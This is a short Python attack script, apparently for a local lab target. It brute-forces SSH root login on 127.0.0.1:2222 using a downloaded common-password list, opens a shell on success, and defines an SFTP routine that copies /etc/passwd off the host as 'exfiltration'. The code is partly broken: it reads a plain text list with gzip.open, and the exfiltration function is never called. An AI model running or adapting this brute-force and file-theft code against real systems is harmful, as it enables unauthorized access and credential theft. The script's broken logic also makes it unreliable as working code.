from pwn import *
import paramiko
import requests
import shutil
import gzip

host = "127.0.0.1"
port = 2222
username = "root"
attempts = 0
timeout = 10

# Download the common passwords file
def download_file(url):
    local_filename = url.split('/')[-1]
    with requests.get(url, stream=True) as r:
        with open(local_filename, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    return local_filename
url = "https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt"
filename = download_file(url)
print("*** Attempts ***")

#Decompress the file and read line per line
with gzip.open(filename, "rb") as pass_list:
    for password in pass_list:
        password  = password.decode("utf-8").strip("\n")
        try:
            client = paramiko.client.SSHClient()
            client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy)
            client.connect(hostname=host, port=port,
                    username=username, password=password, timeout=timeout,
                    look_for_keys=False, allow_agent=False)
            print("[{}] Valid password found: '{}'".format(attempts, password))
            #stdin, stdout, stderr = client.exec_command("ls")
            #print(stdout.read())
            client.invoke_shell()
            break
        except paramiko.ssh_exception.AuthenticationException:
            print("[{}] Invalid password: '{}'".format(attempts, password))
        except paramiko.ssh_exception.SSHException:
            print("[{}] Connection closed".format(attempts))
        except Exception as e:
            print(e)
       # finally:
            #client.close()
        attempts += 1



def exfiltrate_files(client):
    print("*** File Exfiltration Attack ***")
    try:
        sftp = client.open_sftp()
        remote_file = "/etc/passwd"
        local_file = "exfiltrated_passwd.txt"
        sftp.get(remote_file, local_file)
        print(f"File exfiltrated: {remote_file} -> {local_file}")
    except Exception as e:
        print(f"Error during file exfiltration: {e}")
